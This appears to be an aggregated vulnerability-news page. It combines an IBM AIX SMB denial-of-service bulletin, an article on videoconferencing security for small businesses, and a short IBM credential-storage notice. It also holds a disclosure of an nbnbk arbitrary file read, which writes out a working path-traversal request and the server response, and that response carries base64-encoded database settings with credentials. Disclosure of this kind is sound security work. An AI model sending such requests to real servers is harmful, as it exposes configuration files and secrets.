IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1could allow a non-privileged local user to exploit a vulnerability in the AIX SMB client to cause a denial of service. IBM X-Force ID: 238639.

**Security Bulletin**

  

**Summary**

A vulnerability in the AIX SMB client daemon could allow a non-privileged local user to cause a denial of service (CVE-2022-43381). AIX uses the SMB client daemon to access files on SMB servers.

**Vulnerability Details**

**CVEID:**   CVE-2022-43381  
**DESCRIPTION:**   IBM AIX could allow a non-privileged local user to exploit a vulnerability in the AIX SMB client to cause a denial of service.  
CVSS Base score: 6.2  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/238639 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**Affected Products and Versions**

Affected Product(s)

Version(s)

AIX

7.1

AIX

7.2

AIX

7.3

VIOS

3.1

The following fileset levels are vulnerable:

Fileset

Lower Level

Upper Level

smbc.rte

7.1.0.0

7.1.302.8

smbc.rte

7.2.0.0

7.2.302.8

To determine if your system is vulnerable, execute the following commands:

lslpp -L | grep -i smbc.rte

  

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

14 Dec 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSPHKW","label":"PowerVM Virtual I\\/O Server"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"}\],"Version":"3.1","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}},{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SWG10","label":"AIX"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"}\],"Version":"7.1,7.2,7.3","Edition":"","Line of Business":{"code":"LOB08","label":"Cognitive Systems"}}\]

CVE-2022-43381: Security Bulletin: AIX is vulnerable to a denial of service due to the AIX SMB client (CVE-2022-43381)

Securing videoconferencing solutions is just one of many IT security challenges small businesses are facing, often with limited financial and human resources.

It's no secret that the acceleration of work-from-home and distributed workforce trends — infamously spurred on by the pandemic — has occurred in tandem with the rise of video communications and collaboration platforms, led by Zoom, Microsoft, and Cisco.

But given that videoconferencing now plays a critical role in how businesses interact with their employees, customers, clients, vendors, and others, these platforms carry significant potential security risks, researchers say.

Organizations use videoconferencing to discuss M&A, legal, military, healthcare, intellectual property and other topics, and even corporate strategies. A loss of that data could be catastrophic for a company, its employees, its clients, and its customers.

However, a recent Aite-Novarica Group report on videoconferencing security showed that 93% of IT professionals surveyed acknowledged security vulnerabilities and gaping risks in their videoconferencing solutions.

Among the most relevant risks is the lack of controlled access to conversations that could result in disruption, sabotage, compromise, or exposure of sensitive information, while use of nonsecure, outdated, or unpatched videoconferencing applications can expose security flaws.

"The risks include the potential for interruptions, unauthorized access, and perhaps most concerning, the opportunity for a bad actor to acquire sensitive information," says Craig Lurey, CTO and co-founder at Keeper Security.

**Threats Targeting Video Communications Platforms Multiply**

The use of videoconferencing software by remote workers makes it an easy target for various types of attacks in the wild. For instance, "Zoom-bombing" and other attacks came to the fore in the wake of the first work-from-home wave during the pandemic.

Other threats include DDoS attacks, according to the FBI's Internet Crime Report, and malware. In May, for instance, threat hunters discovered a vulnerability chain in Zoom's chat functionality that could be exploited to allow zero-click remote code execution (RCE).

Security firm Vectra also recently discovered a vulnerability in Microsoft Teams, which found that the platform stores authentication tokens unencrypted, allowing any user to access the secrets file without the need for special permissions. The weakness gives attackers the ability to move through a company’s network much more easily.

But while zero-day exploits and other high-profile attacks get a lot of attention, Mike Parkin, senior technical engineer at Vulcan Cyber points out that many, if not most, attacks still target the users.

"That usually means phishing emails or other social engineering attacks that lead to compromise, or business email compromise attacks that can lead to direct losses through fraud," he says.

**SMBs at Particular Risk From Videoconferencing Threats**

The risk is especially piquant for small and medium-sized businesses (SMBs), researchers say. This segment relied heavily on video collaboration to cut travel costs even before the pandemic, and now represents a class of superusers.

At the same time, SMBs may not have the security awareness or in-house expertise necessary to shore up their defenses. Parkin says SMBs often wrestle to implement and manage a proper cybersecurity program.

"That lack of resources can manifest in not knowing, or being able to implement, proper security on their videoconferencing usage," he says.

George Waller, co-founder and executive vice president of Zerify, agrees that SMBs typically don't have the financial and technical resources that larger companies have.

"Therefore, they are far more vulnerable to even the most basic attacks such as email, phishing and ransomware," he says. "Post-pandemic, many SMBs are still working with limited staff and budgets. Therefore, it's easier to trip them up and cause a devastating data breach."

Meanwhile, this sector often faces financial constraints that could make a cyberattack an extinction-level event. According to a recent IBM breach report, the average size of a data breach in the US is now $9.44 million, and 60% of small businesses go out of business within six months of a data breach.

"When cybercriminals steal sensitive, confidential, or classified data, they can make you pay a ransom to get it back," Waller explains. "They can also sell it to other nefarious people, who can use that data to embarrass or profit from your organization."

Unfortunately, amid the challenges, SMBs are often more of a target than they realize.

"While an attacker’s potential take is smaller, the effort is low, the risk is low, and SMB organizations often have less investment in cybersecurity than a larger organization," Parkin explains. "They can be particularly susceptible to ransomware and business email compromise attacks."

**2FA, Zero Trust Help Secure Video Conferencing**

Fortunately, there are some basic steps that businesses of any size can take to ensure the videoconferencing system they're using doesn't fall into the "low-hanging fruit" category for cybercriminals.

For one, they should ensure their platforms and apps offer two-factor authentication (2FA) for both the meeting creator as well as for the meeting participant, and make sure that login links cannot be shared; most videoconferencing platforms have such basic security features and offer advice on how to use them.

Ricardo Villadiego, CEO and founder of Lumu, says businesses for instance should enable security features such as ID and password and end-to-end encryption that allow SMBs to control access to conversations.

"Avoid repeating passwords, lock down microphones and speakers, and authenticate every user prior to entering a videoconference," he says. "Limit the kind of files and links that can be shared via videoconferencing tools, keep meeting recordings only accessible with a password, and don't discuss information that you wouldn't discuss over the telephone."

Waller adds that snooping on video calls via spyware is a threat that SMBs should be aware of, too.

"Make sure that your camera, microphone, and audio-out data streams are locked down and cannot be spied on with malware," he says. "Organizations should also use an anti-keylogging and anti-screen scraping technology and make sure that AV software is up to date."

Lurey, meanwhile, advises SMBs to protect videoconferencing platforms with a zero-trust security architecture that requires all users be authenticated, authorized, and continuously validated before they can access the application.

"Choose a provider wisely and check that it provides end-to-end encryption," he says. "Most major platforms do."

He adds that it's also imperative to configure the platform correctly by enabling built-in security capabilities and providing consistent enforcement to ensure those security features are never disabled.

Finally, Parkin advises that there are other vulnerabilities in some videoconferencing platforms that require specific steps to counter and stresses the importance of keeping the videoconferencing software up to date. Security teams should also proactively monitor network behavior for anomalous activity and make sure to read terms and conditions of the videoconferencing platform being used.

He adds that with a changing threat landscape, the challenge for SMBs in particular is finding the balance between defending against known threats, being positioned to stay ahead of emerging ones, and managing the risk specific to their environment.

"Small businesses are often resource restricted when it comes to cybersecurity, which means they need to be efficient with the resources they do have," he says. "But focusing on things like user education, which can deliver a lot of value for the investment, can help."

Videoconferencing Worries Grow, With SMBs in Cyberattack Crosshairs

nbnbk commit 879858451d53261d10f77d4709aee2d01c72c301 was discovered to contain an arbitrary file read vulnerability via the component /api/Index/getFileBinary.

**nbnbk 存在任意文件读取**

Nbnbk has an arbitrary file read vulnerability

POST /api/Index/getFileBinary HTTP/1.1
Host: nbnbk:8888
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

url=../application/database.php

通过修改 url 参数来读取文件，来看返回数据。  
Return data by modifying the url parameter to read the file.

HTTP/1.1 200 OK
Date: Fri, 04 Mar 2022 03:39:37 GMT
Server: Apache/2.4.46 (Unix) mod\_fastcgi/mod\_fastcgi-SNAP-0910052141 PHP/7.4.21 OpenSSL/1.0.2u mod\_wsgi/3.5 Python/2.7.13
X-Powered-By: PHP/7.4.21
Access-Control-Allow-Origin: \*
Access-Control-Allow-Methods: GET,POST
Access-Control-Allow-Headers: x-requested-with,content-type,x-access-token,x-access-appid
Content-Length: 2784
Connection: close
Content-Type: text/html; charset=UTF-8

{"code":0,"msg":"操作成功","data":"PD9waHAKLy8gKy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\\r\\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KLy8gfCBUaGlua1BIUCBbIFdFIENBTiBETyBJVCBKVVNU\\r\\nIFRISU5LIF0KLy8gKy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\\r\\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KLy8gfCBDb3B5cmlnaHQgKGMpIDIwMDZ+MjAxNiBo\\r\\ndHRwOi8vdGhpbmtwaHAuY24gQWxsIHJpZ2h0cyByZXNlcnZlZC4KLy8gKy0tLS0tLS0tLS0tLS0t\\r\\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0K\\r\\nLy8gfCBMaWNlbnNlZCAoIGh0dHA6Ly93d3cuYXBhY2hlLm9yZy9saWNlbnNlcy9MSUNFTlNFLTIu\\r\\nMCApCi8vICstLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\\r\\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tCi8vIHwgQXV0aG9yOiBsaXUyMXN0IDxsaXUyMXN0QGdtYWls\\r\\nLmNvbT4KLy8gKy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\\r\\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KCi8vIOaVsOaNruW6k+mFjee9ruaWh+S7tgoKcmV0dXJu\\r\\nIFsKICAgIC8vIOaVsOaNruW6k+exu+WeiwogICAgJ3R5cGUnICAgICAgICAgICA9PiAnbXlzcWwn\\r\\nLAogICAgLy8g5pyN5Yqh5Zmo5Zyw5Z2ACiAgICAnaG9zdG5hbWUnICAgICAgID0+ICcxMjcuMC4w\\r\\nLjEnLAogICAgLy8g5pWw5o2u5bqT5ZCNCiAgICAnZGF0YWJhc2UnICAgICAgID0+ICduYm5iaycs\\r\\nCiAgICAvLyDnlKjmiLflkI0KICAgICd1c2VybmFtZScgICAgICAgPT4gJ3Jvb3QnLAogICAgLy8g\\r\\n5a+G56CBCiAgICAncGFzc3dvcmQnICAgICAgID0+ICdwYXNzQCExMjMnLAogICAgLy8g56uv5Y+j\\r\\nCiAgICAnaG9zdHBvcnQnICAgICAgID0+ICc4ODg5JywKICAgIC8vIOi\\/nuaOpWRzbgogICAgJ2Rz\\r\\nbicgICAgICAgICAgICA9PiAnJywKICAgIC8vIOaVsOaNruW6k+i\\/nuaOpeWPguaVsAogICAgJ3Bh\\r\\ncmFtcycgICAgICAgICA9PiBbXSwKICAgIC8vIOaVsOaNruW6k+e8lueggem7mOiupOmHh+eUqHV0\\r\\nZjgKICAgICdjaGFyc2V0JyAgICAgICAgPT4gJ3V0ZjgnLAogICAgLy8g5pWw5o2u5bqT6KGo5YmN\\r\\n57yACiAgICAncHJlZml4JyAgICAgICAgID0+ICdmbF8nLAogICAgLy8g5pWw5o2u5bqT6LCD6K+V\\r\\n5qih5byPCiAgICAnZGVidWcnICAgICAgICAgID0+IGZhbHNlLAogICAgLy8g5pWw5o2u5bqT6YOo\\r\\n572y5pa55byPOjAg6ZuG5Lit5byPKOWNleS4gOacjeWKoeWZqCksMSDliIbluIPlvI8o5Li75LuO\\r\\n5pyN5Yqh5ZmoKQogICAgJ2RlcGxveScgICAgICAgICA9PiAwLAogICAgLy8g5pWw5o2u5bqT6K+7\\r\\n5YaZ5piv5ZCm5YiG56a7IOS4u+S7juW8j+acieaViAogICAgJ3J3X3NlcGFyYXRlJyAgICA9PiBm\\r\\nYWxzZSwKICAgIC8vIOivu+WGmeWIhuemu+WQjiDkuLvmnI3liqHlmajmlbDph48KICAgICdtYXN0\\r\\nZXJfbnVtJyAgICAgPT4gMSwKICAgIC8vIOaMh+WumuS7juacjeWKoeWZqOW6j+WPtwogICAgJ3Ns\\r\\nYXZlX25vJyAgICAgICA9PiAnJywKICAgIC8vIOaYr+WQpuS4peagvOajgOafpeWtl+auteaYr+WQ\\r\\npuWtmOWcqAogICAgJ2ZpZWxkc19zdHJpY3QnICA9PiB0cnVlLAogICAgLy8g5pWw5o2u6ZuG6L+U\\r\\n5Zue57G75Z6LIGFycmF5IOaVsOe7hCBjb2xsZWN0aW9uIENvbGxlY3Rpb27lr7nosaEKICAgICdy\\r\\nZXN1bHRzZXRfdHlwZScgPT4gJ2FycmF5JywKICAgIC8vIOaYr+WQpuiHquWKqOWGmeWFpeaXtumX\\r\\ntOaIs+Wtl+autQogICAgJ2F1dG9fdGltZXN0YW1wJyA9PiBmYWxzZSwKICAgIC8vIOaYr+WQpumc\\r\\ngOimgei\\/m+ihjFNRTOaAp+iDveWIhuaekAogICAgJ3NxbF9leHBsYWluJyAgICA9PiBmYWxzZSwK\\r\\nICAgIC8v5Y+W5raI5YmN5Y+w6Ieq5Yqo5qC85byP5YyWCiAgICAnZGF0ZXRpbWVfZm9ybWF0Jz0+\\r\\nIGZhbHNlLApdOwo=\\r\\n"}

文件信息在 data 字段中，是 base64 编码的格式，但其中包含了大量的 \r\n 导致我们没法直接解码。我们可以通过 js 去将所有 \r\n 删掉。

1.  打开 Google Chrome 游览器
2.  打开一个控制台
3.  输入以下代码

The file information in the data field is in the base64 encoded format, but it contains a large number of \r\n which prevents us from decoding it directly. We can delete all \r\n'through js'.

1.  Open Google Chrome Tour
2.  Open a console
3.  Enter the following code

    a = "$data string"
    a.replaceAll('\r\n', '')
    

演示将上面代码进行转化  
The demonstration transforms the above code

将转化后的数据进行 base64 转码 我使用的是 Google Chrome 插件 FeHelper  
Transcoding the converted data base64 I'm using the Google ChromePlug-inFeHelper

CVE-2022-46492: 🛡️  Nbnbk has an arbitrary file read vulnerability  · Issue #3 · Fanli2012/nbnbk

IBM Security Verify Governance, Identity Manager 10.0.1 stores sensitive information including user credentials in plain clear text which can be read by a local privileged user. IBM X-Force ID: 225007.

Tag

#ibm